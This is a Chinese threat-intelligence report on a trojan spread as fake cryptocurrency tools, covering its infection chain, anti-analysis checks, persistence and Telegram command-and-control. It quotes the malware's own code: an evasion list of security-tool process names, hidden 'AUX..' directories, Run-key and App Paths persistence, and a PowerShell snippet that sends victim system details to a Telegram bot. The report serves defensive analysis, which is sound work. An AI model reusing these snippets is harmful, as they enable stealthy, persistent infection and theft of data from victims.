加密货币市场持续火热,各种“云挖矿工具”、“交易助手”层出不穷。然而,近期腾讯云安全科恩实验室威胁情报团队(以下简称“科恩威胁情报团队”)发现,一些看似诱人的加密货币工具,实则暗藏杀机,成为恶意木马传播的温床。这些木马不仅善于伪装,更具备极强的隐蔽性和持久化能力,一旦感染,将对用户的系统安全和财产构成严重威胁。
近日,科恩威胁情报团队捕获了一类以加密货币工具为载体的木马样本。这款新型木马远非一般的远程控制工具可比,它们通过一系列精心设计的机制流程,实现了对受害者系统的深度渗透和持久性控制。其主要特点包括:
-
•
多层持久化
:采用多种技术手段,确保系统重启后木马依然能够继续运行,难以被彻底清除。
-
•
隐蔽驻留
:利用Windows系统文件夹的命名技巧,躲避安全软件和用户的常规检测。
-
•
冗余控制
:创建多个系统服务,即使部分服务被终止,也能通过其他服务恢复控制。
-
•
高级反分析
:具备强大的反虚拟机、反沙箱和反调试能力,给安全研究人员的分析工作带来极大挑战。
样本在24年底开始传播,通常以加密货币工具的名字进行伪装,如Crypto_Flash.zip, TetherCloud_Mining.zip等
通过对恶意样本的追踪溯源,科恩威胁情报团队发现了初始感染源,是一个伪装加密货币工具样本,相关信息如下:
攻击者精心设计了多阶段的传播和执行流程,极具隐蔽性。
2.1 披着“羊皮”的狼:初始感染载体
这款名为“CRYPTO_FLASH”的恶意软件,伪装成一个能够提供加密货币交易优势的工具,专门针对加密货币投资者和交易者,利用其对快速获利的心理进行诱导。攻击者主要通过以下渠道进行传播:
-
•
虚假宣传
:在伪造的加密货币论坛和社区中发布带有诱惑性标题的帖子。
-
•
定向投放
:通过即时通讯软件群组等渠道,向潜在受害者定向投放。
-
•
虚假网站
:搭建虚假的加密货币交易工具下载网站,诱导用户下载。
2.2 步步为营:完整的感染链流程
通过沙箱环境的动态分析,科恩威胁情报团队还原了该木马完整的感染链:
1.
初始执行
:用户解压并执行CRYPTO_FLASH_t_v2.zip中的安装程序,触发MSI安装过程。
2.
恶意组件释放
:通过MSIexec.exe调用创建C:\ProgramData\dist目录,释放UnRAR.exe和51654.rar。
3.
PowerShell下载
:使用PowerShell从GitHub仓库(https://raw.githubusercontent.com/githa0/0/0/0/confsh)下载额外的恶意脚本。
4.
反分析检测
:执行大量反虚拟机、反沙箱和反调试检测,检测多达30种安全工具和分析环境。
5.
释放核心载荷
:使用UnRAR.exe解压加密的51654.rar(密码:147852369),释放Input.exe等核心恶意组件
6.
多层持久化
:创建特殊目录结构并实施多种持久化机制
7.
远控建立
:配置Telegram Bot Token并建立C2通信
2.3 障眼法:伪装与反取证技术
在整个感染过程中,恶意软件使用了多种伪装技术:
-
•
伪装为MSI安装包
:使用Windows标准安装格式提升可信度
-
•
加密RAR归档
:使用密码保护的RAR防止静态分析
-
•
网络资源利用
:从知名平台GitHub获取额外组件,混淆流量特征
-
•
混淆命令执行
:大量使用环境变量和多层命令调用模糊化实际操作
-
值得注意的是,除了使用Telegram Bot API作为C2通道,样本还尝试连接到XMR加密货币矿池(xmr-eu1.nanopool.org),表明该恶意软件同时具备远程控制和加密货币挖矿功能。
2.4 真实案例:“币圈”用户的惊魂一刻
在互联网大数据挖掘威胁分析过程中,科恩威胁情报团队发现一例某网友被感染文件攻击的过程记录。该网友在寻找某种"bit软件"(可能是比特币相关工具)时,从非官方渠道下载并执行了伪装的安装程序。用户描述"手贱执行过"某个文件后,发现系统异常,主要表现为:
1. 游戏
全屏模式下不断弹出命令行窗口
2. 系统目录中出现无法通过资源管理器访问的特殊目录
3. Cookies目录中出现可疑的命令脚本文件
这与科恩威胁情报团队分析的恶意软件行为特征高度吻合,证实了该威胁在野外的活跃传播状态。
通过静态分析结合文件沙箱系统的深入分析,科恩威胁情报团队深度解析了恶意软件的运行机制。这款恶意软件的部署过程如同一场精心策划的“潜伏行动”,分为两个主要阶段,每个阶段都由特定的脚本文件主导,环环相扣,确保木马能够成功入侵、长期驻留并最终完全控制受害者系统。
3.1 第一阶段:潜入与扎根
第一个脚本(conf)是整个攻击行动的“先锋部队”,主要负责初步的潜入、环境侦察、持久化部署和信息收集:
1.
反分析侦察
:木马首先会进行一系列的环境检测,如同一个谨慎的“间谍”,在行动前先摸清周围环境。它会检查系统中是否存在常见的安全软件、调试工具或虚拟化环境,以避免暴露自身。
set "processList=QHActiveDefense.exe QHWatchdog.exe QHSafeTray.exe PopWndLog.exe ekrn.exe egui.exe spideragent.exe AvastUI.exe avgui.exe avp.exe avpui.exe UninstallTool.exe UninstallToolHelper.exe SandboxieRpcSs.exe SandboxieDcomLaunch.exe httpdebuggerui.exe wireshark.exe fiddler.exe vboxservice.exe df5serv.exe vboxtray.exe vmtoolsd.exe vmwaretray.exe ida64.exe ollydbg.exe pestudio.exe vmwareuser.exe vgauthservice.exe vmacthlp.exe vmsrvc.exe x32dbg.exe x64dbg.exe x96dbg.exe vmusrvc.exe prl_cc.exe prl_tools.exe qemu-ga.exe joeboxcontrol.exe ksdumperclient.exe xenservice.exe joeboxserver.exe devenv.exe immunitydebugger.exe windbg.exe 32dbg.exe 64dbg.exe protection_id.exe scylla_x86.exe scylla_x64.exe scylla.exe idau64.exe idaq64.exe"
for %a in (%processList%) do (
tasklist /FI "IMAGENAME eq %a" 2>NUL | find /I "%a" >NUL
rd /s /q "%ProgramData%\dist"
2.
秘密释放
:确认环境“安全”后,木马开始释放核心的恶意组件。它使用经过密码保护的RAR压缩包来携带主要的恶意载荷,如同一个上了锁的“保险箱”,防止被轻易发现。
"%ProgramData%\dist\UnRAR.exe" x -y -p147852369 "%ProgramData%\dist\51654.rar" "%ProgramData%\dist\"
mkdir \\.\%ProgramData%\AUX..\
fsutil file setshortname C:\ProgramData\AUX..\ ""
3.
持久化部署
:为了确保在系统重启后仍然能够控制受害者系统,木马会采取多种手段来实现持久化。它会修改注册表,添加自启动项,并创建隐藏的VBS脚本,让自己在开机时自动运行。
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v persistence /t REG_SZ /d "C:\Users\DF\Desktop\run.vbs" /f
echo Set dchell = WScript.CreateObject("WScript.Shell") >> C:\Users\DF\Desktop\run.vbs
echo Dchell.Run("powershell.exe C:\ProgramData\AUX..\Input.exe C:\ProgramData\AUX..\Icon.dll"), 0, True >> C:\Users\DF\Desktop\run.vbs
4.
信息刺探与初步回报
:木马会悄悄收集受害者系统的信息,如IP地址、国家、计算机名、用户名、操作系统、硬件信息和杀毒软件信息等,并将其发送给攻击者。这就像一个“侦察兵”,将初步的情报回传给“指挥部”。
powershell -NoProfile -Command ^
"$message = 'RUS' + [System.Environment]::NewLine + 'IP: %IP%' + [System.Environment]::NewLine + 'Country: %Country%' + [System.Environment]::NewLine + 'Worker: %Worker%' + [System.Environment]::NewLine + 'UserName: %UserName%' + [System.Environment]::NewLine + 'Windows: %Windows% %Arch%' + [System.Environment]::NewLine + 'CPU: %CPU%' + [System.Environment]::NewLine + 'GPU: %GPU%' + [System.Environment]::NewLine + 'Antivirus: %Antivirus%';" ^
"[System.Console]::OutputEncoding = [System.Text.Encoding]::UTF8;" ^
"try { Invoke-RestMethod -Uri 'https://api.telegram.org/bot%TOKEN%/sendMessage' -Method POST -Body @{chat_id='%CHAT_ID%'; text=$message} } catch { Write-Host 'Error sending message to Telegram' }"
endlocal
3.2 第二阶段:深度控制与“长期驻守”
第二个脚本(confvz)是木马的“主力部队”,负责建立更深层次的控制机制,并采取各种手段来对抗安全软件的检测和清除:
1.
隐秘藏身:
木马会利用Windows系统的一些特殊设备名称(如NUL、AUX、CON),创建一些难以通过常规方式访问的文件夹,如同在系统中建造了一个“秘密基地”,用于隐藏自身。
2.
多重保险:
为了实现“打不死”的持久化效果,木马设置了多种启动方式,就像为自己上了“多重保险”,确保即使部分启动机制被清除,也能通过其他方式“复活”。这些持久化手段包括:
a. 系统服务持久化
b. WMI事件订阅持久化
c. 注册表运行键持久化
d. 进程退出监控持久化
e. 应用程序劫持持久化
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\start.exe" /t REG_SZ /d "%USERPROFILE%\Cookies\init.cmd" /f
